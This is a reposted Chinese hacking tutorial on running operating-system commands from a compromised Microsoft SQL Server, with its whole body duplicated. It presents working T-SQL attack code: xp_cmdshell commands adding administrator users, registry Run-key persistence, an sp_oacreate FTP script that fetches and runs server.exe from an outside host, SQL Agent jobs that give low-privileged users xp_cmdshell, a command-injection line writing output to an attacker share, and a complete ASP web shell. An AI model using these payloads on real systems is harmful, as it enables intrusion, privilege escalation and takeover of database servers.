How to execute system command in MSSQL
2006-08-16 11:21
543 查看
关键是最后面的可以以public权限执行xp_cmdshell(不过漏洞消息比较旧了,打了sp4的可能用不上了) 我是从http://www.hackhome.com/html/wlcl/hktk/2006/0730/50599.html 贴过来的,最初出处就不知道了
假设一台主机开了1433端口我们已通过SQL注入或是空弱密码远程连接
能有哪些办法加一个系统管理员用户呢(或是执行系统命令)
1).XP_CMDSHELL cmd.exe /c net user aaa bbb /add
人人都知道的办法,最大的好处是有回显,但是最怕
if exists (select * from
dbo.sysobjects where id = object_id(N [dbo].[xp_cmdshell] ) and
OBJECTPROPERTY(id, N IsExtendedProc ) = 1)
exec sp_dropextendedproc N [dbo].[xp_cmdshell]
GO
通过上面的T-SQL语句就可以把这个扩展储存删了
我们一般可以用
2k:
EXEC sp_addextendedproc xp_cmdshell ,@dllname = xplog70.dll
SQL97:
EXEC sp_addextendedproc xp_cmdshell ,@dllname = xpsql70.dll
就还原了.
但是有的人知道sp_addextendedproc也只不过是一个储存过程一样可以删除的
drop PROCEDURE sp_addextendedproc
if exists (select * from
dbo.sysobjects where id = object_id(N [dbo].[xp_cmdshell] ) and
OBJECTPROPERTY(id, N IsExtendedProc ) = 1)
exec sp_dropextendedproc N [dbo].[xp_cmdshell]
GO
还原:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1, sp_addextendedproc )
return (1)
end
/*
** create the extended procedure mapping.
*/
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
唉呀呀写了这么多其实有个最简单的保护办法:
先NET stop mssqlserver,然后把xplog70.dll(SQL97下用xpsql70.dll)删了
再把服务打开就可以了
2)
看了上面的你就明白了xp_cmdshell最终是可以被删除的,没别的办法了吗?
有写注册表三:
xp_regwrite HKEY_LOCAL_MACHINE , SOFTWARE/Microsoft/Windows/currentversion/run , czy82 , REG_SZ , net user czy bb /add
其实注册表还有好几个地方可以写的比如说注册表中的WEB浏览设置
用写注册表的办法不好的地方是不但没有回显而且不能马上运行,实不实用我也不知道了:(
3)
declare @s int
exec sp_oacreate "wscript.shell",@s out
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open asp.7i24.com>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo get server.exe>>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo close>>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c ftp -s:c:/a.txt"
exec sp_oamethod @s,"run",NULL,"cmd.exe /c server"
对了正如你看到的我们还可以使用sp_oacreate和sp_oamethod,在它们的作用下我们可以
调用系统的控件比如说fso,wsh,shell什么的,但是有个问题是并不能象xp_cmdshell那样
马上看到结果,真的不能吗看下面的:
declare @s int,@o int ,@f int,@str nvarchar(4000)
/*exec sp_oacreate "wscript.shell",@s out
exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user>c:/temp.txt"*/
exec sp_oacreate "scripting.filesystemobject", @o out
exec sp_oamethod @o, "opentextfile", @f out,"c:/temp.txt", 1
exec sp_oamethod @f, "readall",@str out
print @str
先执行注解内的然后执行外面的其实原理很简单就是利用>把结果写到一个文件中然后用
fso来读出来!很实用的:)
------------------------------------------
写到这儿该作个总结了上面三个办法可能大家都知道吧
下面的可能知道的人就少了:)
------------------------------------------
4)
use msdb; --这儿不要是master哟
exec sp_add_job @job_name= czy82 ;
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:/>c:/b.txt ;
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
exec sp_start_job @job_name= czy82 ;
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
执行tsql语句了.
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
net start SQLSERVERAGENT
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
USE msdb
EXEC sp_add_job @job_name = GetSystemOnSQL ,
@enabled = 1,
@description = This will give a low privileged user access to
xp_cmdshell ,
@delete_level = 1
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
@step_name = Exec my sql ,
@subsystem = TSQL ,
@command = exec master..xp_execresultset N select exec
master..xp_cmdshell "dir > c:/agent-job-results.txt" ,N Master
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
@server_name = 你的SQL的服务器名
EXEC sp_start_job @job_name = GetSystemOnSQL
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
才让我们可以以public执行xp_cmdshell
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
USE msdb
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
@enabled = 1,
@description = This will create a file called c:/sqlafc123.txt ,
@delete_level = 1
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
@step_name = SQLAFC ,
@subsystem = TSQL ,
@command = select hello, this file was created by the SQL Agent. ,
@output_file_name = c:/sqlafc123.txt
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
@server_name = SERVER_NAME
EXEC sp_start_job @job_name = ArbitraryFilecreate
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.
(1 ?????)
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
命令的vbs文件到启动目录!
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
关于sp_MScopyscriptfile 看下面的例子
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command= dir c:/ > "//attackerip/share/dir.txt"
select @scripfile= c:/autoexec.bat > nul" | + @command + | rd "
exec sp_MScopyscriptfile @scripfile ,
这两个东东都还在测试试哟
让MSSQL的public用户得到一个本机的web shell:)
sp_makewebtask @outputfile= d:/sms/a.asp ,@charset=gb2312,
--@query= select <img src=vbscript:msgbox(now())>
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
@query= select
<%On Error Resume Next
Set oscript = Server.createObject("wscript.SHELL")
Set oscriptNet = Server.createObject("wscript.NETWORK")
Set oFileSys = Server.createObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
szTempFile = "C:/" & oFileSys.GetTempName()
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
</FORM><PRE>
<% If (IsObject(oFile))Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If%>
</BODY></HTML>
假设一台主机开了1433端口我们已通过SQL注入或是空弱密码远程连接
能有哪些办法加一个系统管理员用户呢(或是执行系统命令)
1).XP_CMDSHELL cmd.exe /c net user aaa bbb /add
人人都知道的办法,最大的好处是有回显,但是最怕
if exists (select * from
dbo.sysobjects where id = object_id(N [dbo].[xp_cmdshell] ) and
OBJECTPROPERTY(id, N IsExtendedProc ) = 1)
exec sp_dropextendedproc N [dbo].[xp_cmdshell]
GO
通过上面的T-SQL语句就可以把这个扩展储存删了
我们一般可以用
2k:
EXEC sp_addextendedproc xp_cmdshell ,@dllname = xplog70.dll
SQL97:
EXEC sp_addextendedproc xp_cmdshell ,@dllname = xpsql70.dll
就还原了.
但是有的人知道sp_addextendedproc也只不过是一个储存过程一样可以删除的
drop PROCEDURE sp_addextendedproc
if exists (select * from
dbo.sysobjects where id = object_id(N [dbo].[xp_cmdshell] ) and
OBJECTPROPERTY(id, N IsExtendedProc ) = 1)
exec sp_dropextendedproc N [dbo].[xp_cmdshell]
GO
还原:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1, sp_addextendedproc )
return (1)
end
/*
** create the extended procedure mapping.
*/
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
唉呀呀写了这么多其实有个最简单的保护办法:
先NET stop mssqlserver,然后把xplog70.dll(SQL97下用xpsql70.dll)删了
再把服务打开就可以了
2)
看了上面的你就明白了xp_cmdshell最终是可以被删除的,没别的办法了吗?
有写注册表三:
xp_regwrite HKEY_LOCAL_MACHINE , SOFTWARE/Microsoft/Windows/currentversion/run , czy82 , REG_SZ , net user czy bb /add
其实注册表还有好几个地方可以写的比如说注册表中的WEB浏览设置
用写注册表的办法不好的地方是不但没有回显而且不能马上运行,实不实用我也不知道了:(
3)
declare @s int
exec sp_oacreate "wscript.shell",@s out
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open asp.7i24.com>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo get server.exe>>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo close>>c:/a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c ftp -s:c:/a.txt"
exec sp_oamethod @s,"run",NULL,"cmd.exe /c server"
对了正如你看到的我们还可以使用sp_oacreate和sp_oamethod,在它们的作用下我们可以
调用系统的控件比如说fso,wsh,shell什么的,但是有个问题是并不能象xp_cmdshell那样
马上看到结果,真的不能吗看下面的:
declare @s int,@o int ,@f int,@str nvarchar(4000)
/*exec sp_oacreate "wscript.shell",@s out
exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user>c:/temp.txt"*/
exec sp_oacreate "scripting.filesystemobject", @o out
exec sp_oamethod @o, "opentextfile", @f out,"c:/temp.txt", 1
exec sp_oamethod @f, "readall",@str out
print @str
先执行注解内的然后执行外面的其实原理很简单就是利用>把结果写到一个文件中然后用
fso来读出来!很实用的:)
------------------------------------------
写到这儿该作个总结了上面三个办法可能大家都知道吧
下面的可能知道的人就少了:)
------------------------------------------
4)
use msdb; --这儿不要是master哟
exec sp_add_job @job_name= czy82 ;
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:/>c:/b.txt ;
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
exec sp_start_job @job_name= czy82 ;
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
执行tsql语句了.
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
net start SQLSERVERAGENT
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
USE msdb
EXEC sp_add_job @job_name = GetSystemOnSQL ,
@enabled = 1,
@description = This will give a low privileged user access to
xp_cmdshell ,
@delete_level = 1
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
@step_name = Exec my sql ,
@subsystem = TSQL ,
@command = exec master..xp_execresultset N select exec
master..xp_cmdshell "dir > c:/agent-job-results.txt" ,N Master
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
@server_name = 你的SQL的服务器名
EXEC sp_start_job @job_name = GetSystemOnSQL
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
才让我们可以以public执行xp_cmdshell
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
USE msdb
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
@enabled = 1,
@description = This will create a file called c:/sqlafc123.txt ,
@delete_level = 1
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
@step_name = SQLAFC ,
@subsystem = TSQL ,
@command = select hello, this file was created by the SQL Agent. ,
@output_file_name = c:/sqlafc123.txt
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
@server_name = SERVER_NAME
EXEC sp_start_job @job_name = ArbitraryFilecreate
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.
(1 ?????)
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
命令的vbs文件到启动目录!
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
关于sp_MScopyscriptfile 看下面的例子
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command= dir c:/ > "//attackerip/share/dir.txt"
select @scripfile= c:/autoexec.bat > nul" | + @command + | rd "
exec sp_MScopyscriptfile @scripfile ,
这两个东东都还在测试试哟
让MSSQL的public用户得到一个本机的web shell:)
sp_makewebtask @outputfile= d:/sms/a.asp ,@charset=gb2312,
--@query= select <img src=vbscript:msgbox(now())>
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
@query= select
<%On Error Resume Next
Set oscript = Server.createObject("wscript.SHELL")
Set oscriptNet = Server.createObject("wscript.NETWORK")
Set oFileSys = Server.createObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
szTempFile = "C:/" & oFileSys.GetTempName()
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
</FORM><PRE>
<% If (IsObject(oFile))Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If%>
</BODY></HTML>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- How to execute system command in MSSQL
- How to execute system command in MSSQL
- How to execute the command with root jurisdiction in pyCharm
- How to Execute a Command in C# ?
- How to create and execute JAR file in Java – Command line Eclipse Netbeans
- How to execute an OS command in SQL*PLUS without leaving the session ?
- How to Take Ownership of a File/Folder Using Command-Line in Windows 7 or newer version System
- How to Execute a Command in C# ?
- How to Mount and Unmount Filesystem / Partition in Linux (Mount/Umount Command Examples)
- How to Execute a Command in C#
- The easy way to execute sudo command in Python using subprocess.Popen
- How to enable USB selective suspend and system wake in the UMDF driver for a USB device
- How to estimate the active condition records in a CRM system (2)
- how to execute sql script in c#
- [quote] How to determine what target is given in Makefile from the make command-line?
- Howto Reboot or halt Linux system in emergency (ZT)
- How to create new view by using cleartool command in Clearcase?
- ExecuteScalar requires the command to have a transaction when the connection assigned to the command is in a pending
- How To Get System Info In Linux
- How to run java and junit in command line